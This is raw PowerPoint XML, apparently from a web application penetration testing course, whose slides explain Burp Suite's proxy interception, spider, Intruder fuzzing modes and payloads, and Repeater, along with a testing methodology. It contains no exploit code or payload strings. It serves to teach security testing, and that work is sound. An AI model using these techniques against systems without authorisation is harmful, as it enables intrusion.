              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>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Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1327673"/>
            <a:ext cx="5943600" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The proxy options provide a number of features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Most are based on changing traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We can control interception here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>These allow for real-time modification of requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Burp can be set to change the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Before it gets to the application or browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For example, we can change redirect responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To exploit flaws where the redirect contains data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1828800"/>
            <a:ext cx="2890928" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28205434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Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1676400"/>
            <a:ext cx="8305800" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The proxy has a web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Really a display of the history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This is only accessible through the proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>One of the reasons to constrain the proxy listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This allows for displaying the traffic seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Also has a button </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to have the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>browser repeat the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5638800"/>
            <a:ext cx="9144000" cy="961982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4114800"/>
            <a:ext cx="4838700" cy="1612900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13775999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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Spider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152401" y="1405890"/>
            <a:ext cx="4495800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp spider is fed by the proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any HTTP request sent through the proxy can be used to start the spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>By default it will start with the most recent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is one of the more capable spiders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Handles some of the more difficult client-side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The spider can authenticate using provided credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Spider also stores pre-determined answers for forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69636" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-12000" contrast="8000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4545013" y="2057400"/>
            <a:ext cx="4598987" cy="3581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9637" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5688013" y="4495800"/>
            <a:ext cx="1143000" cy="52387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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Scope Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69638" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1830157">
            <a:off x="5373688" y="3979863"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1706880"/>
            <a:ext cx="3886200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder is the automated attack tool within the suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We send requests from the other tools to the intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can then choose which attacks we would like to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4934910-5352-4631-B98B-D06047369C8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260037" y="1971464"/>
            <a:ext cx="4883963" cy="274568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381000" y="137160"/>
            <a:ext cx="8458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vuln Discovery Phase Elements and the Organization of PEWAPT101.3 &amp; PEWAPT101.4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1392004"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In our methodology, we first run automated web application vulnerability scanning tools to get a feel for potential flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then manually interact with the target to verify the presence of the flaw and determine its risk and implications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And, finally, we may write one or more custom scripts tailored to the target application to exploit the flaw in a more impactful way than is possible manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This approach leads directly to the overall outline for PWAPT101.3 and PEWAPT101.4:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripting techniques for pen testers (focused here on Python) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Descriptions of flaws and techniques for manual verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated web app vulnerability scanning tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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Fuzzing Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1272540"/>
            <a:ext cx="8077200" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Intruder has four fuzzing types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Based on how payloads are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sniper – Most commonly used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Each position is fuzzed, one at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Most fuzzing attacks work here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Battering Ram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>One set of payloads is injected into all positions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Useful is more than one parameter needs to be set the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Pitchfork</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Each position is fuzzed simultaneously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Useful if related injections are needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cluster Bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Iterates through each position's payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Similar to sniper except for multiple positions at once</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26835812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Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1155700"/>
            <a:ext cx="4876800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Payloads are the injected values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Intruder contains some basic ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>But allows for additional ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>FuzzDB is an excellent source!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Intruder includes the ability to process the payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Match and replace or encode for example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It displays approximately how many requests it will make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Based on your choices and attack type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922520" y="1676400"/>
            <a:ext cx="4025436" cy="3898900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23426316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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1661160"/>
            <a:ext cx="4191000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The repeater is used to resubmit transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use this to verify results we have found in the other parts of Burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Repeater allows us to see both the request that was sent and the response from the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Whether to follow redirects or not is a configurable option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
